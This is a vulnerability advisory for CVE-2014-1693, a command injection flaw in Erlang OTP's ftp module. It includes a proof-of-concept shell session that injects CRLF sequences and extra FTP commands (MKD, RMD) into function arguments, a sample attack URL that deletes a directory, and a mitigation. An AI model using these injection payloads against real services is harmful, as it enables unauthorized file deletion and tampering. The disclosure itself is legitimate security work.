Erlang OTP ftp module FTP Command Injection

2014.01.29
Credit: Sebastian Tello
Risk: High
Local: No
Remote: Yes
CVE: CVE-2014-1693
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Hi, This has been reported to erlang-bugs mailing list: http://erlang.org/pipermail/erlang-bugs/2014-January/003998.html There is an FTP Command Injection vulnerability in the "ftp" module. All those functions that write any string argument in the control socket seem to be vulnerable: user/3 user/4 account/2 cd/2 ls/2 nlist/2 rename/3 delete/2 mkdir/2 rmdir/2 recv/2 recv/3 recv_bin/2, recv_chunk_start/2 send/3 send_bin/3 send_chunk_start/2 append_chunk_start/2 append/2 append/3 append_bin/3 Vulnerability Description ------------------------- By injecting a \r\n sequence followed by a new command in a function argument you get the ftp module to write the whole string in the socket. E.g. the following erlang shell session: 1> inets:start(). ok 2> {ok, Pid} = inets:start(ftpc, [{host, "127.0.0.1"}]). {ok,<0.46.0>} 3> ftp:user(Pid, "anonymous", "password\r\nCWD pub\r\nMKD new_dir"). ok 4> ftp:cd(Pid, "/pub\r\nRMD new_dir\r\nPASV"). ok Generates the following FTP session: FTP command: Client "127.0.0.1", "USER anonymous" FTP response: Client "127.0.0.1", "331 Please specify the password." FTP command: Client "127.0.0.1", "PASS <password>" FTP response: Client "127.0.0.1", "230 Login successful." FTP command: Client "127.0.0.1", "CWD pub" FTP response: Client "127.0.0.1", "250 Directory successfully changed." FTP command: Client "127.0.0.1", "MKD new_dir" FTP response: Client "127.0.0.1", "257 "/pub/new_dir" created" FTP command: Client "127.0.0.1", "CWD /pub" FTP response: Client "127.0.0.1", "250 Directory successfully changed." FTP command: Client "127.0.0.1", "RMD new_dir" FTP response: Client "127.0.0.1", "250 Remove directory operation successful." FTP command: Client "127.0.0.1", "PASV" FTP response: Client "127.0.0.1", "227 Entering Passive Mode (127,0,0,1,130,161)." Attack Scenario Example ----------------------- A web server allow users to navigate and download documents. Internally the web server connects to a private ftp server using OTP "ftp" module. An attacker might take advantage of the vulnerability to execute actions that aren't supposed to be exposed. E.g. delete a directory by requesting: http://www.example.com/list_dir.yaws?dir=/docs/%0d%0aRMD+/docs Tested on --------- - Erlang OTP: R15B03 - Ubuntu 12.04 x86_64 - FTP Sever: vsftpd Mitigation ---------- Until this is fixed and the proper sanitization is implemented within the ftp module, string arguments should get "\r" and "\n" removed before being passed to these functions. Sebastin Tello

References:

http://erlang.org/pipermail/erlang-bugs/2014-January/003998.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top